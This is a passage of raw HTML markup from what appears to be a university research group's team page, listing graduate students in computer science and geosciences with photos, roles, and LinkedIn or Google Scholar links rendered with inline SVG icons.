(http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-856 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-852 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-857 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c189-outer\">\n            <div data-colibri-id=\"182-c189\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c189 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c190\" class=\"d-block style-854 style-local-182-c190 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/anupam.jpg\" class=\"wp-image-1624 style-854-image style-local-182-c190-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c190-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c191\" class=\"h-global-transition-all h-heading style-850 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c191\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c192\" class=\"h-text h-text-component style-851 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-text h-text-component style-902 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"style-855 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-854 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-902 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-855 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 